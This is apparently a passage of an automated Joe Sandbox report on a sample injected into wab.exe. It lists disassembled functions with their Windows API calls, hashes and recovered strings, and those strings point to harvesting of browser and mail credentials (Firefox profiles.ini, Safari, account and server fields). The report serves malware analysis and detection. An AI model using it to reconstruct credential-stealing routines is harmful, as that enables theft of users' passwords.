                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ClipboardFile$Global$CloseTemp$AllocDataDeleteDirectoryEmptyErrorHandleLastNameOpenPathReadSizeWindowsWire
                                                • String ID:
                                                • API String ID: 1203541146-0
                                                • Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                • Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
                                                • Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
                                                • Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@??3@memcpymemset
                                                • String ID:
                                                • API String ID: 1865533344-0
                                                • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041739B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Version
                                                • String ID:
                                                • API String ID: 1889659487-0
                                                • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: NtdllProc_Window
                                                • String ID:
                                                • API String ID: 4255912815-0
                                                • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                Download Yara Rule
                                                APIs
                                                • _wcsicmp.MSVCRT ref: 004022A6
                                                • _wcsicmp.MSVCRT ref: 004022D7
                                                • _wcsicmp.MSVCRT ref: 00402305
                                                • _wcsicmp.MSVCRT ref: 00402333
                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                • memset.MSVCRT ref: 0040265F
                                                • memcpy.MSVCRT ref: 0040269B
                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                • memcpy.MSVCRT ref: 004026FF
                                                • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                • API String ID: 577499730-1134094380
                                                • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                • String ID: :stringdata$ftp://$http://$https://
                                                • API String ID: 2787044678-1921111777
                                                • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                • GetWindowRect.USER32(?,?), ref: 00414088
                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                • GetDC.USER32 ref: 004140E3
                                                • wcslen.MSVCRT ref: 00414123
                                                • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                • ReleaseDC.USER32(?,?), ref: 00414181
                                                • _snwprintf.MSVCRT ref: 00414244
                                                • SetWindowTextW.USER32(?,?), ref: 00414258
                                                • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                • GetClientRect.USER32(?,?), ref: 004142E1
                                                • GetWindowRect.USER32(?,?), ref: 004142EB
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                • GetClientRect.USER32(?,?), ref: 0041433B
                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                • String ID: %s:$EDIT$STATIC
                                                • API String ID: 2080319088-3046471546
                                                • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • EndDialog.USER32(?,?), ref: 00413221
                                                • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                • memset.MSVCRT ref: 00413292
                                                • memset.MSVCRT ref: 004132B4
                                                • memset.MSVCRT ref: 004132CD
                                                • memset.MSVCRT ref: 004132E1
                                                • memset.MSVCRT ref: 004132FB
                                                • memset.MSVCRT ref: 00413310
                                                • GetCurrentProcess.KERNEL32 ref: 00413318
                                                • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                • memset.MSVCRT ref: 004133C0
                                                • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                • memcpy.MSVCRT ref: 004133FC
                                                • wcscpy.MSVCRT ref: 0041341F
                                                • _snwprintf.MSVCRT ref: 0041348E
                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                • SetFocus.USER32(00000000), ref: 004134B7
                                                Strings
                                                • {Unknown}, xrefs: 004132A6
                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                • API String ID: 4111938811-1819279800
                                                • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                • EndDialog.USER32(?,?), ref: 0040135E
                                                • DeleteObject.GDI32(?), ref: 0040136A
                                                • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                • ShowWindow.USER32(00000000), ref: 00401398
                                                • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                • ShowWindow.USER32(00000000), ref: 004013A7
                                                • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                • String ID:
                                                • API String ID: 829165378-0
                                                • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 00404172
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                • wcscpy.MSVCRT ref: 004041D6
                                                • wcscpy.MSVCRT ref: 004041E7
                                                • memset.MSVCRT ref: 00404200
                                                • memset.MSVCRT ref: 00404215
                                                • _snwprintf.MSVCRT ref: 0040422F
                                                • wcscpy.MSVCRT ref: 00404242
                                                • memset.MSVCRT ref: 0040426E
                                                • memset.MSVCRT ref: 004042CD
                                                • memset.MSVCRT ref: 004042E2
                                                • _snwprintf.MSVCRT ref: 004042FE
                                                • wcscpy.MSVCRT ref: 00404311
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                • API String ID: 2454223109-1580313836
                                                • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                • SetMenu.USER32(?,00000000), ref: 00411453
                                                • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                • memcpy.MSVCRT ref: 004115C8
                                                • ShowWindow.USER32(?,?), ref: 004115FE
                                                • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                  • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                  • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                • API String ID: 4054529287-3175352466
                                                • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: wcscat$_snwprintfmemset$wcscpy
                                                • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                • API String ID: 3143752011-1996832678
                                                • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AddressProc$HandleModule
                                                • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                • API String ID: 667068680-2887671607
                                                • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _snwprintfmemset$wcscpy$wcscat
                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                • API String ID: 1607361635-601624466
                                                • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _snwprintf$memset$wcscpy
                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                • API String ID: 2000436516-3842416460
                                                • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                  • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                  • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                  • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                • String ID:
                                                • API String ID: 1043902810-0
                                                • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@??3@_snwprintfwcscpy
                                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
